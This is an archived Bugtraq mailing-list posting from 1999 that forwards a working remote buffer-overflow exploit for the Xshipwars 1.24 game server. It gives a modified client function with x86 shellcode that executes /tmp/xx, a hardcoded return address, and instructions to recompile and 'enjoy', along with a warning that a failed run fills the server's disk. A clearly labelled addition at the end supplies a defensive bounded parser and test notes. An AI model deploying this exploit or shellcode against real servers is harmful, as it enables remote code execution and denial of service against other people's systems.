Bugtraq mailing list archives
xsw 1.24 remote buffer overflow
From: aleph1 () UNDERGROUND ORG (Aleph One)
Date: Thu, 9 Dec 1999 11:05:03 -0800
---------- Forwarded message ----------
Date: Tue, 7 Dec 1999 22:31:02 -0600
To: news () technotronic com
From: Amanda Woodward <amandawoodward2 () altavista com>
Subject: xsw 1.24 remote buffer overflow

Xshipwars remote overflow.
Found and written by Amanda Woodward. (amandawoodward2 () altavista com)
Latest Server Version Tested: 1.24 (This was the bug they fixed for 1.25)

Xshipwars is a server/client combination that allows you to play a little game with good sounds and graphics over TCP/IP on Linux or Windows or whatever. They give out source to the clients and the server. It's in playable beta and there are public servers on mit.edu and a few other places. See: http://fox.mit.edu/xsw/

If you replace this function in netsend.c with the stuff at the bottom of this file, log into your (or another) server and type "e" and then hit enter in the dialog box, it will crash, possibly running the shellcode, which currently calls /tmp/xx. Shellcode could be created that does something more interesting, but this is just a demo exploit. I'm sure other parts of the protocol have problems as well.

This one was interesting because it's a one-byte overflow against esp which gives you the eip a bit later. If you go OVER that one byte, you don't get eip. If you go under, then it overwrites with other random things. Trust me.

If the offset is off for your box, then the server will still crash, and will begin an endless loop of sending itself log messages, filling up whatever space it can on whatever partition it's installed on. This is less than optimal behavior, so quickly find and kill the server if your exploit fails.

Love,
A. Woodward, Dec 1999

<cut this and paste it into your client's source file, modify your .h's to raise the limit on a few variables (grep for 256 and turn them into 2560), recompile, and enjoy>

/*
 * Sends a literal command.
 */
/* hacked to send our attack buffer! */
int NetSendExec(char *arg)
{
    char larg[CS_MESG_MAX];
    char sndbuf[CS_DATA_MAX_LEN];
    char exploitbuf[CS_DATA_MAX_LEN];
    int i;

    /* test shellcode. No whitespace, just execs /tmp/xx. If it's not
     * there, does random things. Replace this for slightly more fun. ;> */
    char code[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
        "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
        "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/tmp/xx";

#define SIZEOFBUF 229
    memset(exploitbuf, 0x41, SIZEOFBUF);
#define SHELLSTART 50
    memcpy(exploitbuf + SHELLSTART, code, strlen(code));

    /* Return to: 0xbfffebe4  Your Kilometerage May Vary */
    exploitbuf[132] = 0xe4;
    exploitbuf[133] = 0xeb;
    exploitbuf[134] = 0xff;
    exploitbuf[135] = 0xbf;
    exploitbuf[SIZEOFBUF - 1] = 0;

    /*
    if(arg == NULL)
        return(-1);
    if(arg[0] == '\0')
        return(-2);
    */

    /* strncpy(larg, arg, CS_MESG_MAX); */
    strncpy(larg, exploitbuf, CS_MESG_MAX);
    larg[CS_MESG_MAX - 1] = '\0';

    /*
     * NET_CMD_EXEC format is as follows:
     *
     *      argument
     */
    sprintf(sndbuf, "%i %s\n", CS_CODE_LITERALCMD, larg);
    NetSendData(sndbuf);

    return(0);
}
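The defensive side of the bug above, added here as an example that is not part of the posting and not Xshipwars code (neither the 1.24 server nor the 1.25 fix): a bounded parser for the "<code> <argument>\n" line format the NET_CMD_EXEC comment describes. The receiving side copies the argument into a fixed-size stack buffer only when it fits together with its terminator, and rejects anything longer instead of writing past the buffer. The limit of 256 is an assumption taken from the "grep for 256" hint in the message, the code value 7 is a placeholder, and parse_literal_cmd and make_line are hypothetical names. The length check is written as n >= argsz rather than n > argsz precisely because a one-byte slip there is the kind of off-by-one the advisory exploits.

```c
/* Added example, not Xshipwars code: a bounded parser for a
 * "<code> <argument>\n" protocol line. MESG_MAX = 256 is an assumed
 * server-side limit (from the advisory's "grep for 256" hint). */
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MESG_MAX 256   /* assumed fixed size of the argument buffer */

enum parse_result { PARSE_OK = 0, PARSE_BAD_FORMAT = -1, PARSE_TOO_LONG = -2 };

/* Parse "code argument\n" into *code and arg (capacity argsz bytes).
 * Returns PARSE_OK, PARSE_BAD_FORMAT or PARSE_TOO_LONG; on any failure
 * arg is left as an empty string and *code is untouched. */
int parse_literal_cmd(const char *line, int *code, char *arg, size_t argsz)
{
    const char *p, *end;
    char *num_end;
    long v;
    size_t n;

    if (arg == NULL || argsz == 0) return PARSE_BAD_FORMAT;
    arg[0] = '\0';
    if (line == NULL || code == NULL) return PARSE_BAD_FORMAT;

    /* Leading integer code, then exactly one space. */
    errno = 0;
    v = strtol(line, &num_end, 10);
    if (num_end == line || errno != 0 || v < INT_MIN || v > INT_MAX)
        return PARSE_BAD_FORMAT;
    if (*num_end != ' ') return PARSE_BAD_FORMAT;
    p = num_end + 1;

    /* The argument runs up to the newline (or the end of the string). */
    end = strchr(p, '\n');
    if (end == NULL) end = p + strlen(p);
    n = (size_t)(end - p);
    if (n == 0) return PARSE_BAD_FORMAT;

    /* n bytes plus the terminator must fit: n == argsz is already too long. */
    if (n >= argsz) return PARSE_TOO_LONG;

    memcpy(arg, p, n);
    arg[n] = '\0';
    *code = (int)v;
    return PARSE_OK;
}

/* Constructed input: "<code> " followed by len bytes of 'A' and a newline,
 * the shape a client with raised limits could send. Caller frees. */
char *make_line(int code, size_t len)
{
    char *buf = malloc(len + 32);
    int hdr;
    if (buf == NULL) return NULL;
    hdr = sprintf(buf, "%i ", code);
    memset(buf + hdr, 'A', len);
    buf[hdr + len] = '\n';
    buf[hdr + len + 1] = '\0';
    return buf;
}

int main(void)
{
    char arg[MESG_MAX];
    int code = 0;
    char *ok  = make_line(7, 20);     /* fits comfortably */
    char *bad = make_line(7, 2560);   /* ten times the assumed limit */
    printf("short line: %d\n", parse_literal_cmd(ok, &code, arg, sizeof arg));
    printf("long line:  %d\n", parse_literal_cmd(bad, &code, arg, sizeof arg));
    free(ok);
    free(bad);
    return 0;
}
```

The boundary cases are the ones worth keeping in a regression test: an argument of MESG_MAX - 1 bytes is the longest that must be accepted, and MESG_MAX bytes must already be refused, since the terminator needs the last slot.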